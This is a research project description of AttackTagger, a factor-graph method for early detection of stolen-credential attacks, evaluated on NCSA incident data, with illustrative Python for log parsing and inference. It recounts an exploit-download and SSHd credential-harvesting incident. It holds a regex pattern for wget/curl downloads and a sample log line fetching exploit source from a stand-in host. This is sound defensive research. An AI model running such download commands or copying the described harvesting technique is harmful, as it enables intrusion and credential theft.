Despite sophisticated monitoring tools for runtime intrusion detection and techniques designed to protect computing systems from a wide range of attacks, attackers continually penetrate even well-protected systems. In this work, attack data from a real, large-scale production environment (the National Center for Supercomputing Applications (NCSA) at Illinois) are used as a basis for characterizing and modeling attacker behavior and for uncovering deficiencies in the monitoring infrastructure. The improved understanding of attacks gained from these analyses and models contributes significantly to the analysis and design of secure systems. The analyses uncover new and realistic attack scenarios that can guide the design of enhancements that improve system protection against malicious activities at every level. Understanding real attack patterns and classes through detailed forensics pinpoints security holes in a network or system and characterizes attacker behavior. In-depth study of the data allows us to investigate the actions and intentions of the attacker and creates a foundation for the design of an automated tool to assist in data collection, analysis, and response. The size and variety of the data enable the development of a flexible framework that can incorporate insights gained from attacks not yet seen.
This research produces sound methods for automated and semi-automated analysis of large volumes of data on security attacks and develops tools to facilitate analysis and detection. The goals are to understand attack patterns, establish comprehensive models that capture attacker behavior, and use these models to develop techniques for rapid detection of malicious tampering with the system.
Project Goals
This project lays the foundations for methods to: (i) characterize and model attacker behavior, (ii) uncover deficiencies of the security monitoring infrastructure, and (iii) aid in the design of new techniques for security monitoring. Data on security incidents from a real, large-scale production environment (the National Center for Supercomputing Applications, NCSA, at Illinois) are used as the basis for the analysis. The investigations provide new and realistic attack scenarios and patterns for security researchers, and the results can guide the design of enhancements that improve system protection against malicious activities at every level of the system. By studying the data in detail, we can investigate the actions and intentions of the attacker and create a foundation for the design of an automated tool to assist in data collection, analysis, and response. The size and variety of the data allow us to develop a flexible framework and toolset that can incorporate lessons and insights from new attacks as they occur.
Approach
Attackers often use stolen credentials to enter a target system while disguised as legitimate users, effectively bypassing conventional defenses such as network firewalls. Such masquerade attacks are frequently discovered only in the final stage, when the attack payload is delivered, resulting in a leak of confidential data or an interruption of critical system services. Our objective is to detect masquerade attacks in their early stages, before the attackers execute their payloads, and to provide a supporting tool that helps security engineers prevent such attacks.
To address the challenges of detecting masquerade attacks, we propose AttackTagger, a software framework that uses Factor Graphs (a type of probabilistic graphical model) to represent the functional relations between the observed evidence (the event sequence) and the hidden system/user states in order to detect compromised users. Figure 1 shows an example of a real multi-stage security incident and its representation using the factor graph abstraction. The events of an incident in which an attacker penetrates the system using stolen credentials are shown at the top of Figure 1: a user logs into the target system from a remote host using the secure shell (SSH); then, a source file (vm64.c) is downloaded from a server; finally, the SSH daemon (SSHd) is restarted. Post-incident analysis showed that the attacker downloaded, compiled, and executed a privilege escalation exploit on the target node. To harvest the credentials of users logging into the compromised node, the attacker escalated to root privileges and injected credential-collecting code into the original SSHd, forcing it to restart. Figure 2 depicts the generic process of labeling state sequences using a factor graph, from the extraction of events from the data logs to attack detection. To detect attackers at run time, we convert raw logs to discrete events and label each event with a user state that represents the user's suspiciousness level (benign, suspicious, or malicious). For example, the login event in Figure 1 is labeled benign based on prior knowledge. A factor function (a black square in Figure 1) takes event labels as inputs and outputs a discrete value. The factor functions are defined manually based on analysis of data on past security incidents, knowledge of the target system, and the experience of security experts.
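As a rough illustration of the first step (converting raw logs to discrete events), the following Python sketch maps log lines to event names with regular expressions. The log line formats, the patterns in `EVENT_PATTERNS`, the event names `download_source` and `restart_sshd`, and the sample log are hypothetical assumptions chosen to mirror the Figure 1 incident; they are not AttackTagger's actual extraction rules.

```python
import re

# Hypothetical patterns mapping raw log lines to discrete event names
# (illustrative only, not the project's real extraction rules).
EVENT_PATTERNS = [
    (re.compile(r"sshd\[\d+\]: Accepted \S+ for \S+ from \S+"), "login"),
    (re.compile(r"\b(?:wget|curl)\s+\S+\.c\b"), "download_source"),
    (re.compile(r"sshd\[\d+\]: Received SIGHUP"), "restart_sshd"),
]


def extract_events(lines):
    """Convert raw log lines into a sequence of discrete event names."""
    events = []
    for line in lines:
        for pattern, name in EVENT_PATTERNS:
            if pattern.search(line):
                events.append(name)
                break  # the first matching pattern wins
        # lines that match no pattern are ignored
    return events


# Hypothetical log excerpt modeled on the Figure 1 incident.
SAMPLE_LOG = [
    "Jan 10 03:12:01 node1 sshd[2211]: Accepted password for alice from 203.0.113.7 port 52144 ssh2",
    "Jan 10 03:13:40 node1 bash[2301]: alice ran: wget http://203.0.113.9/vm64.c",
    "Jan 10 03:20:05 node1 sshd[1022]: Received SIGHUP; restarting.",
    "Jan 10 03:21:00 node1 cron[3000]: job completed",
]
```

Calling `extract_events(SAMPLE_LOG)` yields the event sequence login, download_source, restart_sshd; the cron entry matches no pattern and is dropped, so only security-relevant observations reach the labeling stage.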
A user is identified as compromised when the last label in the sequence, which represents the evolution of the user state over time, indicates that the user state is malicious.
Evaluation
We apply this approach to detect masquerade attacks well before the system is misused. Using detailed information on security incidents that occurred over a six-year period (2008-2013) at NCSA, we identify attack attributes such as user profiles (e.g., the user's role or registered physical location), events (i.e., observations of user activities leading to a successful compromise), and measurements of the network and system (e.g., the number of alerts observed in the system). As an attack progresses, a hidden state variable (i.e., a user state) is associated with each observed event. We then use a Factor Graph model to define the evolution of the attack, in which observed and hidden variables are linked by factor functions representing functional relations among the variables. AttackTagger automatically assesses whether a user account is compromised (i.e., whether the user state is malicious). Data on 24 real-world masquerade incidents are used to evaluate the proposed approach. AttackTagger detects 75% of the attacks early (from minutes to tens of hours before the attack payloads are executed) in real time. Compared with rule-based and machine learning classification techniques, our method achieves a higher attack detection rate, a faster response time, and a lower false-positive rate.
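The labeling and detection rule can be sketched, under simplifying assumptions, as MAP inference on a linear-chain factor graph: each event is linked to its user state by a hypothetical factor `event_factor`, consecutive states are linked by a hypothetical factor `transition_factor`, and max-sum (Viterbi) inference recovers the highest-scoring state sequence. The integer factor values are invented for illustration; in AttackTagger the factor functions are defined from past incidents and expert knowledge, and the model also uses attributes such as user profiles and alert counts that this sketch omits.

```python
# Hypothetical user states, ordered by suspiciousness.
STATES = ("benign", "suspicious", "malicious")
RANK = {s: i for i, s in enumerate(STATES)}

# Hypothetical event-state factor scores (higher = more compatible).
EVENT_SCORES = {
    "login": {"benign": 2, "suspicious": 0, "malicious": -2},
    "download_source": {"benign": 0, "suspicious": 2, "malicious": 1},
    "restart_sshd": {"benign": -2, "suspicious": 1, "malicious": 3},
}


def event_factor(event, state):
    """Factor linking an observed event to the hidden user state."""
    return EVENT_SCORES.get(event, {}).get(state, 0)  # unknown events are neutral


def transition_factor(prev, cur):
    """Factor linking consecutive user states."""
    step = RANK[cur] - RANK[prev]
    if step < 0 or step > 1:
        return -1  # discourage de-escalation and jumps that skip a level
    return 0


def map_states(events):
    """Max-sum (Viterbi) inference: highest-scoring user-state sequence."""
    score = {s: event_factor(events[0], s) for s in STATES}
    backpointers = []
    for event in events[1:]:
        new_score, ptr = {}, {}
        for cur in STATES:
            best_prev = max(STATES, key=lambda p: score[p] + transition_factor(p, cur))
            new_score[cur] = (score[best_prev] + transition_factor(best_prev, cur)
                              + event_factor(event, cur))
            ptr[cur] = best_prev
        score = new_score
        backpointers.append(ptr)
    # Trace back from the best final state.
    path = [max(STATES, key=score.get)]
    for ptr in reversed(backpointers):
        path.append(ptr[path[-1]])
    return path[::-1]


def is_compromised(events):
    """Flag the user when the last inferred state is malicious."""
    return bool(events) and map_states(events)[-1] == "malicious"
```

With these made-up scores, `map_states(["login", "download_source", "restart_sshd"])` returns benign, suspicious, malicious, so the user is flagged once the SSHd restart is observed. After only the login and the download, the last state is suspicious, which illustrates where an early warning could be raised before the payload runs.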